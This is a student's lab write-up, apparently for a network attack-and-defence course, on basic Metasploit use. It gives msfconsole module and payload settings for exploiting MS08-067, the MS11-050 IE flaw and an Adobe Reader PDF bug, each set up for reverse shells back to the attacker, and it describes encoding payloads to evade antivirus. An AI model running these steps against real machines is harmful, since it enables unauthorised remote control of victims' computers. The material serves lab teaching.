zoukankan      html  css  js  c++  java
  • 20145225唐振遠《网络对抗》Exp5 MSF基础应用

     

     

    基础问题回答

    1. 用自己的话解释什么是exploit,payload,encode
      • exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。
      • payload也就相当于载荷,实际上就是之前我们实验中做到的shellcodeexploit把它传送到靶机中后,它就负责执行相应的攻击代码。
      • encode也就是编码,它主要是为了避免之前的payload中出现坏字符,从而影响payload的功能,其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

    实践过程记录

    MS08_067漏洞渗透攻击(主动攻击)

    • 使用winXPenSP3为靶机;
    • 首先得确保两台机子在同一网段内
    • 终端中打开msfconsole,输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块;
    • 使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷;
    • 设置具体参数:set LHOST Kali的IPset RHOST Windows的IP
    • show options查看所有参数是否设置正确,最后下令发起攻击exploit:

     

    MS11050安全漏洞(IE浏览器渗透攻击)

    • 终端中打开msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块;
    • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
    • 设置具体参数:set LHOST Kali的IPset LPORT 自定义端口号set URIPATH 自定义域名
    • show options查看所有参数是否设置正确,最后下令发起攻击exploit:

    Adobe阅读器渗透攻击(针对客户端)

    • 终端中打开msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,使用Adobe阅读器漏洞模块;
    • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
    • 设置具体参数:set FILENAME 自定义文件名.pdfset LHOST Kali的IPset LPORT 自定义端口号
    • show options查看所有参数是否设置正确,最后输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;

    辅助模块的应用:scanner/http/dir_listing

    通过上面三个实验不难看出msf的使用还是有套路可循的:进入模块->指定荷载->设置参数->发动攻击

  • 相关阅读:
    一个秒杀系统的设计
    2018年终总结-从我所在的团队回首一年技术变迁
    温习LOGO语言
    微信公众平台配置-笔记
    Spring mongotemplate使用
    三种方法实现MNIST 手写数字识别
    Python 实现0-1背包
    Python 实现快速排序和随机快速排序
    Spring+SpringMVC+Mybatis搭建的网站的处理流程总结
    Mybatis功能架构及执行流程
  • 原文地址:https://www.cnblogs.com/nizaikanwoma/p/6720517.html
Copyright © 2011-2022 走看看